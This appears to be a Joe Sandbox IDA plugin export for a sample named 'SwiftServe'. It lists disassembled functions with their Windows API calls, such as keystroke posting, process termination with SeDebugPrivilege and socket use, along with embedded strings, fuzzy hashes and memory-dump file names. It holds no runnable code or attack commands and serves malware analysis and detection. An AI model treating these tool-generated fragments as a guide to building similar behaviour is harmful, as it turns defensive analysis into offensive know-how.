Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 3a9bc055a1a1a9cb29a7105de33b799caa1a265431a6436a75e8926dcd801e71
Instruction ID: 64b247ec89e3288687860a9aabbe8804f0678ff50be778a9b59b255008adfb9e
Opcode Fuzzy Hash: 3a9bc055a1a1a9cb29a7105de33b799caa1a265431a6436a75e8926dcd801e71
Instruction Fuzzy Hash: F551A970600309AFEB24DF25DD55BAA7BB5EB48711F20151CFA42B7290DB70E994DB50

Function 00E7A226 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E7B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E7B54D
Part of subcall function 00E7B52D: GetCurrentThreadId.KERNEL32 ref: 00E7B554
Part of subcall function 00E7B52D: AttachThreadInput.USER32(00000000,?,00E7A23B,?,00000001), ref: 00E7B55B

MapVirtualKeyW.USER32(00000025,00000000), ref: 00E7A246
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E7A263
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00E7A266
MapVirtualKeyW.USER32(00000025,00000000), ref: 00E7A26F
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E7A28D
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E7A290
MapVirtualKeyW.USER32(00000025,00000000), ref: 00E7A299
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E7A2B0
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00E7A2B3

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: d90bc0873608110bc4a3cd684f820e616fe2546b6d721563b14e17786c96568a
Instruction ID: 390dddcce6b184bed8d8371b86e1a5a70d598eef4d0c88fa4268a6a0292129c9
Opcode Fuzzy Hash: d90bc0873608110bc4a3cd684f820e616fe2546b6d721563b14e17786c96568a
Instruction Fuzzy Hash: 131104B1950218BEF6106F659C8AFAB3F6DEB8C790F105519F7447B0E0CAF36C509AA4

Function 00E794D9 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E7915A,00000B00,?,?), ref: 00E794E2
HeapAlloc.KERNEL32(00000000,?,00E7915A,00000B00,?,?), ref: 00E794E9
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E7915A,00000B00,?,?), ref: 00E794FE
GetCurrentProcess.KERNEL32(?,00000000,?,00E7915A,00000B00,?,?), ref: 00E79506
DuplicateHandle.KERNEL32(00000000,?,00E7915A,00000B00,?,?), ref: 00E79509
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E7915A,00000B00,?,?), ref: 00E79519
GetCurrentProcess.KERNEL32(00E7915A,00000000,?,00E7915A,00000B00,?,?), ref: 00E79521
DuplicateHandle.KERNEL32(00000000,?,00E7915A,00000B00,?,?), ref: 00E79524
CreateThread.KERNEL32(00000000,00000000,00E7954A,00000000,00000000,00000000), ref: 00E7953E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 691017c078f253509a28de703394928cf9cb182503e4bff5381e002a05568574
Instruction ID: 0f243223b4166f9ae2ae70b41fdba1a44aaee01f39b315f6636c03bd6783ffc2
Opcode Fuzzy Hash: 691017c078f253509a28de703394928cf9cb182503e4bff5381e002a05568574
Instruction Fuzzy Hash: 8001C2B5241304BFE710AFA5DC4DF677B6CEB89711F004511FA05EB1A1D670A804CB30

Function 00E9A20D Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00E9A265
NULL Pointer assignment, xrefs: 00E9A28E, 00E9A5B2

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: ba4044e459a56c7812978c18ece08be6f64d6287354ceeaef04afe51c19dbaaf
Instruction ID: 817b86999752fbe53284481ebf245b7bfb77b468c913839e738e4475bfb06a6b
Opcode Fuzzy Hash: ba4044e459a56c7812978c18ece08be6f64d6287354ceeaef04afe51c19dbaaf
Instruction Fuzzy Hash: 2CC19D71A0021A9FDF10CFA8C885AAEB7F5FF48314F199439E915BB280E770AD45CB91

Function 00E997FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E99851
VariantInit.OLEAUT32(?), ref: 00E99922
VariantInit.OLEAUT32(?), ref: 00E99A23
VariantClear.OLEAUT32(?), ref: 00E99A2D
VariantClear.OLEAUT32(?), ref: 00E99A8A

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00E99A06
Null Object assignment in FOR..IN loop, xrefs: 00E998B2, 00E999E0, 00E99A98

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 8cb8f559d98e300fe40dcc85cd76154c6a62e6e261419ba2443834569f1f4dfa
Instruction ID: 5411c8cae260cab030f3c1d1430f9a107656479c0a72c8101de1e5c0883aa5eb
Opcode Fuzzy Hash: 8cb8f559d98e300fe40dcc85cd76154c6a62e6e261419ba2443834569f1f4dfa
Instruction Fuzzy Hash: AB918C70A00219ABDF24CFA9C844FAEBBB8EF85714F10955EF515BB282D7709945CBA0

Function 00EA73A5 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EA7449
SendMessageW.USER32(?,00001036,00000000,?), ref: 00EA745D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EA7477
_wcscat.LIBCMT ref: 00EA74D2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00EA74E9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EA7517

Strings

SysListView32, xrefs: 00EA741B

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: e190ed701f608419d6f460fcbcc3d9fb5301859605cbd8d4d56089af3f749991
Instruction ID: e5e2f059c33da92d60c2c169039ae74022bf5fd228493d2e4520b2d1c6d021ad
Opcode Fuzzy Hash: e190ed701f608419d6f460fcbcc3d9fb5301859605cbd8d4d56089af3f749991
Instruction Fuzzy Hash: 2E419170A04348AFEB21DF64CC85BEE7BE8EF0D354F10552AF994BA191D671AD88CB50

Function 00E9F01C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00E84148: CreateToolhelp32Snapshot.KERNEL32 ref: 00E8416D
Part of subcall function 00E84148: Process32FirstW.KERNEL32(00000000,?), ref: 00E8417B
Part of subcall function 00E84148: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00E84245

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E9F08D
GetLastError.KERNEL32 ref: 00E9F0A0
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E9F0CF
TerminateProcess.KERNEL32(00000000,00000000), ref: 00E9F14C
GetLastError.KERNEL32(00000000), ref: 00E9F157
CloseHandle.KERNEL32(00000000), ref: 00E9F18C

Strings

SeDebugPrivilege, xrefs: 00E9F0AB

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 1701285019-2896544425
Opcode ID: 9d908c67c32921b41c0294347fcf3694c7bd30c4c6a7983d66c35c74f11a197e
Instruction ID: 9c14e829fcc52f322835d1103edae4a0c5f3b9c306011239e17409da20b02f7f
Opcode Fuzzy Hash: 9d908c67c32921b41c0294347fcf3694c7bd30c4c6a7983d66c35c74f11a197e
Instruction Fuzzy Hash: 5A41DE703012019FDB25EF25DCA9F6EB7E5AF80714F489018F846AB2D3CB74A804CB85

Function 00E847E8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E84802
LoadStringW.USER32(00000000), ref: 00E84809
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E8481F
LoadStringW.USER32(00000000), ref: 00E84826
_wprintf.LIBCMT ref: 00E8484C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E8486A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00E84847

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 9c40868cdc6e93619149a38bf2d6d8db1639667591fa94c3e6b70b05fe7d3fc2
Instruction ID: 02442ab9395d2cd136ed89ea786a688151ec9d10d95e7b70606fe7d8c59b0be1
Opcode Fuzzy Hash: 9c40868cdc6e93619149a38bf2d6d8db1639667591fa94c3e6b70b05fe7d3fc2
Instruction Fuzzy Hash: 900167F29003087FE711E7A59D89EF7736CD748300F400595B749F2041E674AE884B75

Function 00EADB04 Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E229E2: GetWindowLongW.USER32(?,000000EB), ref: 00E229F3

GetSystemMetrics.USER32(0000000F), ref: 00EADB42
GetSystemMetrics.USER32(0000000F), ref: 00EADB62
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00EADD9D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EADDBB
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EADDDC
ShowWindow.USER32(00000003,00000000), ref: 00EADDFB
InvalidateRect.USER32(?,00000000,00000001), ref: 00EADE20
DefDlgProcW.USER32(?,00000005,?,?), ref: 00EADE43

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 77533b6790ea08e527156493df742273631a418f97e807675d35f8071ebf3f6c
Instruction ID: c2a0189799fe8580d6878d4d91dbb57364b276f03ac92ca7751eabecb1d06622
Opcode Fuzzy Hash: 77533b6790ea08e527156493df742273631a418f97e807675d35f8071ebf3f6c
Instruction Fuzzy Hash: DCB1BC30A04219EFCF14CF29C9847AE7BB1FF09715F08D169EC49AEA95D730A950CB90

Function 00EA0371 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E31A36: _memmove.LIBCMT ref: 00E31A77

Part of subcall function 00EA147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA040D,?,?), ref: 00EA1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA044E

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 6b91091d30a50d5fce6145922db89ac5745c21331889440535367e2061beece5
Instruction ID: 3b55aa2c34ba651b868876f2259590cde1f5c4b1f15ae4d007f03f17fe47c359
Opcode Fuzzy Hash: 6b91091d30a50d5fce6145922db89ac5745c21331889440535367e2061beece5
Instruction Fuzzy Hash: 7AA18D702042019FCB10EF24C895F6EBBE5AF89318F14995DF596AB2A1DB31F945CF41

Function 00E22E2B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E5C508,00000004,00000000,00000000,00000000), ref: 00E22E9F
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E5C508,00000004,00000000,00000000,00000000,000000FF), ref: 00E22EE7
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E5C508,00000004,00000000,00000000,00000000), ref: 00E5C55B
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E5C508,00000004,00000000,00000000,00000000), ref: 00E5C5C7

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 5c0ada622f36dc5feae01deeee1bc33b00d199e352c2879faf46a01abfee4563
Instruction ID: 44b3cac69efb66892d89a080c513c5ac0c4e27cda0ba8501b0c411a56bf4ac14
Opcode Fuzzy Hash: 5c0ada622f36dc5feae01deeee1bc33b00d199e352c2879faf46a01abfee4563
Instruction Fuzzy Hash: 49411B306047A0BEC7375B29AC8C6AB7BD2BB81305F26781EEA4776560CB71B844E711

Function 00EA67F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00EA6810
GetDC.USER32(00000000), ref: 00EA6818
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EA6823
ReleaseDC.USER32(00000000,00000000), ref: 00EA682F
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EA686B
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EA687C
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00EA964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00EA68B6
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00EA68D6

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: d113cd3c762322da7617c7d85f13c6f745dbf65ca1cf8901aff8409ba762ee26
Instruction ID: 1c8998bbe8f9f212ac18c6e742d859b740f399a0cde105edd76382474f9fd7ee
Opcode Fuzzy Hash: d113cd3c762322da7617c7d85f13c6f745dbf65ca1cf8901aff8409ba762ee26
Instruction Fuzzy Hash: 32318D72101210BFEB158F11CC4AFAB3BADEF4A765F040165FE08AE291C675AC51CB70

Function 00E7C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00E7C75D
_memcmp.LIBCMT ref: 00E7C77F
_memcmp.LIBCMT ref: 00E7C797
_memcmp.LIBCMT ref: 00E7C7AA
_memcmp.LIBCMT ref: 00E7C7C4
_memcmp.LIBCMT ref: 00E7C7D7
_memcmp.LIBCMT ref: 00E7C7EF
_memcmp.LIBCMT ref: 00E7C80A

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 421c96356278b6f59a46201376f5dbd46f21d9bec54a121fd9d8a2e7b85a5807
Instruction ID: c9d7754343bb0a8db21f57e472487998db8bfe85b5194b12eb038199534a066c
Opcode Fuzzy Hash: 421c96356278b6f59a46201376f5dbd46f21d9bec54a121fd9d8a2e7b85a5807
Instruction Fuzzy Hash: 2A21D7726012157AE6087530DD83FEF77AC9F15748F24B069FE0AB6343EB10DE118AA1

Function 00E8F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00E24D37: __itow.LIBCMT ref: 00E24D62
Part of subcall function 00E24D37: __swprintf.LIBCMT ref: 00E24DAC

Part of subcall function 00E3436A: _wcscpy.LIBCMT ref: 00E3438D

_wcstok.LIBCMT ref: 00E8F2D7
_wcscpy.LIBCMT ref: 00E8F366
_memset.LIBCMT ref: 00E8F399

Strings

X, xrefs: 00E8F3D6

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 1275c06629ce4633453c80a1a5614414816a4481b5a4ecb53fb850354ef70731
Instruction ID: 98361e026171df6e8178d1da5a60bdb7ca60077585ed8a86574e170909175866
Opcode Fuzzy Hash: 1275c06629ce4633453c80a1a5614414816a4481b5a4ecb53fb850354ef70731
Instruction Fuzzy Hash: 78C18A716087409FC714EF24D885A5ABBE4FF84314F00696DF89DAB2A2DB30ED45CB82

Function 00E971EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E972EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E9730C
WSAGetLastError.WSOCK32(00000000), ref: 00E9731F
htons.WSOCK32(?,?,?,00000000,?), ref: 00E973D5
inet_ntoa.WSOCK32(?), ref: 00E97392

Part of subcall function 00E7B4EA: _strlen.LIBCMT ref: 00E7B4F4
Part of subcall function 00E7B4EA: _memmove.LIBCMT ref: 00E7B516

_strlen.LIBCMT ref: 00E9742F
_memmove.LIBCMT ref: 00E97498

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: e2b934a84fe15da20c79033b02930c3ee12b282808c8b2cdf23d40aad890e8ff
Instruction ID: 7d366d7e624ce1eb053d1d51e9f50695feeb985788987e2bd0a805770ac2995d
Opcode Fuzzy Hash: e2b934a84fe15da20c79033b02930c3ee12b282808c8b2cdf23d40aad890e8ff
Instruction Fuzzy Hash: 5281D4B1618310ABC714EB24DC85E6BBBE8AF84714F10651CF595BB2E2EB30ED05CB91

Function 00E21800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.2389748399.0000000000E21000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000019.00000002.2389726095.0000000000E20000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000EB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389795958.0000000000ED6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389848134.0000000000EE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000019.00000002.2389870963.0000000000EE9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_e20000_SwiftServe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa15f0129adc9d703096ffa43d3210393e7458ec4750cf6f6b119014eb8c35c2
Instruction ID: 6cb605b9d1ca60bdcded171b4d4d03e0051e95cee41d3f02b069a6e769e2ae90
Opcode Fuzzy Hash: aa15f0129adc9d703096ffa43d3210393e7458ec4750cf6f6b119014eb8c35c2
Instruction Fuzzy Hash: E6715D30900119EFDB08DF58DC89ABEBBB9FF96315F148199F915BA251C730AA51CBA0

Function 00EAB9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01845440), ref: 00EABA5D
IsWindowEnabled.USER32(01845440), ref: 00EABA69
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00EABB4D
SendMessageW.USER32(01845440,000000B0,?,?), ref: 00EABB84
IsDlgButtonChecked.USER32(?,?), ref: 00EABBC1
GetWindowLongW.USER32(01845440,000000EC), ref: 00EABBE3
